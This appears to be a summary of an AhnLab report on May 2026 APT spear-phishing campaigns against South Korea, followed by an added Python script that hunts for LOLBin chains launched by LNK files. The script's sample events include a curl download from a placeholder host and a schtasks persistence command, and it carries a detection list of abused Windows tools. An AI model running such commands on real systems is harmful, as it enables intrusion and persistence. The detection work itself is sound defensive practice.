May 2026 Threat Trend Report on APT Attacks (South Korea)
2026-06-29 • AhnLab
AhnLab observed May 2026 South Korea-focused APT activity dominated by spear phishing, especially malicious LNK attachments and some CHM files. The attack chains used PowerShell, CMD, XML, JS, VBScript, BAT files, AutoIt, HTA, Python, and legitimate Windows tools such as curl.exe, regsvr32.exe, certutil.exe, wscript.exe, mshta, and Task Scheduler to download payloads, maintain persistence, and run backdoors or infostealers. Reported payload behavior included command execution, file upload and download, directory querying, system information theft, keylogging, XenoRAT-type deployment, DLL side-loading, and Python backdoor communications with attacker infrastructure.
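One way to hunt for the chain described above, as an added example that is not from the AhnLab report: it walks process ancestry in constructed process-creation events and flags the Windows tools the report names when they descend from a shell started directly by explorer.exe, which is how a double-clicked LNK launches its target. The event field names, the sample events, and the use of schtasks.exe to represent Task Scheduler are assumptions.

```python
from typing import Dict, List

# Tools named in the report; schtasks.exe stands in for "Task Scheduler" (assumption).
LOLBINS = {"curl.exe", "regsvr32.exe", "certutil.exe",
           "wscript.exe", "mshta.exe", "schtasks.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
LNK_PARENT = "explorer.exe"  # a double-clicked shortcut runs its target under Explorer

# Constructed sample events; field names are assumptions, not a real log schema.
EVENTS = [
    {"pid": 100, "ppid": 4,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"pid": 210, "ppid": 100, "image": "cmd.exe",        "cmd": "cmd.exe /c powershell -File a.ps1"},
    {"pid": 211, "ppid": 210, "image": "powershell.exe", "cmd": "powershell -File a.ps1"},
    {"pid": 212, "ppid": 211, "image": "curl.exe",       "cmd": "curl.exe -o b.dat https://example.invalid/b"},
    {"pid": 213, "ppid": 211, "image": "schtasks.exe",   "cmd": "schtasks.exe /create /tn Upd /tr b.bat /sc daily"},
    {"pid": 300, "ppid": 100, "image": "notepad.exe",    "cmd": "notepad.exe notes.txt"},
    {"pid": 400, "ppid": 4,   "image": "services.exe",   "cmd": "services.exe"},
    {"pid": 410, "ppid": 400, "image": "curl.exe",       "cmd": "curl.exe https://example.invalid/health"},
]

def ancestry(pid: int, by_pid: Dict[int, dict]) -> List[dict]:
    """Return the process and its ancestors, child first; stops on an unknown parent or a loop."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def find_lnk_style_chains(events: List[dict]) -> List[List[str]]:
    """Return root-to-leaf image chains where a listed tool runs below an Explorer-spawned shell."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["image"].lower() not in LOLBINS:
            continue
        images = [p["image"].lower() for p in ancestry(e["pid"], by_pid)]
        # Flag only when some ancestor is a shell whose own parent is Explorer.
        for child, parent in zip(images[1:], images[2:]):
            if child in SHELLS and parent == LNK_PARENT:
                hits.append(list(reversed(images)))
                break
    return hits
```

An administrator who opens a console from Explorer and runs curl.exe by hand matches the same shape, so pair the hit with the command line and the originating file before alerting.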
Indicators of Compromise